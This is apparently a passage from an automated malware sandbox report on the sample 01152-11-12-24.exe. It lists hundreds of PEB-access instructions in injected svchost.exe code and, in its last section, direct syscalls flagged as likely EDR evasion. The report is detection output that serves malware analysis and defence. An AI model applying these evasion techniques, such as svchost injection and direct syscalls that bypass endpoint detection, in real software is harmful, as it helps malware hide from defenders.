                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E420 mov eax, dword ptr fs:[00000030h]7_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E420 mov eax, dword ptr fs:[00000030h]7_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392E420 mov eax, dword ptr fs:[00000030h]7_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392C427 mov eax, dword ptr fs:[00000030h]7_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6420 mov eax, dword ptr fs:[00000030h]7_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EA456 mov eax, dword ptr fs:[00000030h]7_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392645D mov eax, dword ptr fs:[00000030h]7_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395245A mov eax, dword ptr fs:[00000030h]7_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E443 mov eax, dword ptr fs:[00000030h]7_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395A470 mov eax, dword ptr fs:[00000030h]7_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395A470 mov eax, dword ptr fs:[00000030h]7_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395A470 mov eax, dword ptr fs:[00000030h]7_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BC460 mov ecx, dword ptr fs:[00000030h]7_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940BBE mov eax, dword ptr fs:[00000030h]7_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940BBE mov eax, dword ptr fs:[00000030h]7_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E4BB0 mov eax, dword ptr fs:[00000030h]7_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E4BB0 mov eax, dword ptr fs:[00000030h]7_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DEBD0 mov eax, dword ptr fs:[00000030h]7_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03950BCB mov eax, dword ptr fs:[00000030h]7_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03950BCB mov eax, dword ptr fs:[00000030h]7_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03950BCB mov eax, dword ptr fs:[00000030h]7_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930BCD mov eax, dword ptr fs:[00000030h]7_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930BCD mov eax, dword ptr fs:[00000030h]7_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930BCD mov eax, dword ptr fs:[00000030h]7_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938BF0 mov eax, dword ptr fs:[00000030h]7_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938BF0 mov eax, dword ptr fs:[00000030h]7_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938BF0 mov eax, dword ptr fs:[00000030h]7_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395EBFC mov eax, dword ptr fs:[00000030h]7_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BCBF0 mov eax, dword ptr fs:[00000030h]7_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AEB1D mov eax, dword ptr fs:[00000030h]7_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04B00 mov eax, dword ptr fs:[00000030h]7_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395EB20 mov eax, dword ptr fs:[00000030h]7_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395EB20 mov eax, dword ptr fs:[00000030h]7_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F8B28 mov eax, dword ptr fs:[00000030h]7_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F8B28 mov eax, dword ptr fs:[00000030h]7_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03928B50 mov eax, dword ptr fs:[00000030h]7_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DEB50 mov eax, dword ptr fs:[00000030h]7_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E4B4B mov eax, dword ptr fs:[00000030h]7_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E4B4B mov eax, dword ptr fs:[00000030h]7_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C6B40 mov eax, dword ptr fs:[00000030h]7_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C6B40 mov eax, dword ptr fs:[00000030h]7_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FAB40 mov eax, dword ptr fs:[00000030h]7_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D8B42 mov eax, dword ptr fs:[00000030h]7_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392CB7E mov eax, dword ptr fs:[00000030h]7_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]7_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]7_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]7_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A02B57 mov eax, dword ptr fs:[00000030h]7_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968A90 mov edx, dword ptr fs:[00000030h]7_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393EA80 mov eax, dword ptr fs:[00000030h]7_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04A80 mov eax, dword ptr fs:[00000030h]7_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938AA0 mov eax, dword ptr fs:[00000030h]7_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938AA0 mov eax, dword ptr fs:[00000030h]7_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03986AA4 mov eax, dword ptr fs:[00000030h]7_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930AD0 mov eax, dword ptr fs:[00000030h]7_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03964AD0 mov eax, dword ptr fs:[00000030h]7_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03964AD0 mov eax, dword ptr fs:[00000030h]7_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03986ACC mov eax, dword ptr fs:[00000030h]7_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03986ACC mov eax, dword ptr fs:[00000030h]7_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03986ACC mov eax, dword ptr fs:[00000030h]7_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396AAEE mov eax, dword ptr fs:[00000030h]7_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396AAEE mov eax, dword ptr fs:[00000030h]7_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BCA11 mov eax, dword ptr fs:[00000030h]7_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03954A35 mov eax, dword ptr fs:[00000030h]7_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03954A35 mov eax, dword ptr fs:[00000030h]7_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396CA38 mov eax, dword ptr fs:[00000030h]7_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396CA24 mov eax, dword ptr fs:[00000030h]7_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395EA2E mov eax, dword ptr fs:[00000030h]7_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]7_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]7_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]7_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]7_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]7_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]7_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936A50 mov eax, dword ptr fs:[00000030h]7_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940A5B mov eax, dword ptr fs:[00000030h]7_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940A5B mov eax, dword ptr fs:[00000030h]7_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039ACA72 mov eax, dword ptr fs:[00000030h]7_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039ACA72 mov eax, dword ptr fs:[00000030h]7_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396CA6F mov eax, dword ptr fs:[00000030h]7_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396CA6F mov eax, dword ptr fs:[00000030h]7_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396CA6F mov eax, dword ptr fs:[00000030h]7_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DEA60 mov eax, dword ptr fs:[00000030h]7_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B89B3 mov esi, dword ptr fs:[00000030h]7_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B89B3 mov eax, dword ptr fs:[00000030h]7_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B89B3 mov eax, dword ptr fs:[00000030h]7_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039429A0 mov eax, dword ptr fs:[00000030h]7_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039309AD mov eax, dword ptr fs:[00000030h]7_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039309AD mov eax, dword ptr fs:[00000030h]7_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]7_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]7_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]7_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]7_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]7_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393A9D0 mov eax, dword ptr fs:[00000030h]7_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039649D0 mov eax, dword ptr fs:[00000030h]7_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FA9D3 mov eax, dword ptr fs:[00000030h]7_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C69C0 mov eax, dword ptr fs:[00000030h]7_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039629F9 mov eax, dword ptr fs:[00000030h]7_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039629F9 mov eax, dword ptr fs:[00000030h]7_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BE9E0 mov eax, dword ptr fs:[00000030h]7_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BC912 mov eax, dword ptr fs:[00000030h]7_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03928918 mov eax, dword ptr fs:[00000030h]7_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03928918 mov eax, dword ptr fs:[00000030h]7_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE908 mov eax, dword ptr fs:[00000030h]7_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE908 mov eax, dword ptr fs:[00000030h]7_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B892A mov eax, dword ptr fs:[00000030h]7_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C892B mov eax, dword ptr fs:[00000030h]7_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B0946 mov eax, dword ptr fs:[00000030h]7_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04940 mov eax, dword ptr fs:[00000030h]7_2_03A04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D4978 mov eax, dword ptr fs:[00000030h]7_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D4978 mov eax, dword ptr fs:[00000030h]7_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BC97C mov eax, dword ptr fs:[00000030h]7_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03956962 mov eax, dword ptr fs:[00000030h]7_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03956962 mov eax, dword ptr fs:[00000030h]7_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03956962 mov eax, dword ptr fs:[00000030h]7_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397096E mov eax, dword ptr fs:[00000030h]7_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397096E mov edx, dword ptr fs:[00000030h]7_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0397096E mov eax, dword ptr fs:[00000030h]7_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BC89D mov eax, dword ptr fs:[00000030h]7_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930887 mov eax, dword ptr fs:[00000030h]7_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E8C0 mov eax, dword ptr fs:[00000030h]7_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A008C0 mov eax, dword ptr fs:[00000030h]7_2_03A008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C8F9 mov eax, dword ptr fs:[00000030h]7_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C8F9 mov eax, dword ptr fs:[00000030h]7_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039FA8E4 mov eax, dword ptr fs:[00000030h]7_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BC810 mov eax, dword ptr fs:[00000030h]7_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03952835 mov eax, dword ptr fs:[00000030h]7_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03952835 mov eax, dword ptr fs:[00000030h]7_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03952835 mov eax, dword ptr fs:[00000030h]7_2_03952835
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_009480A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_009480A9
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091A124 SetUnhandledExceptionFilter,0_2_0091A124
                Source: C:\Users\user\Desktop\01152-11-12-24.exeCode function: 0_2_0091A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0091A155

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtOpenKeyEx: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
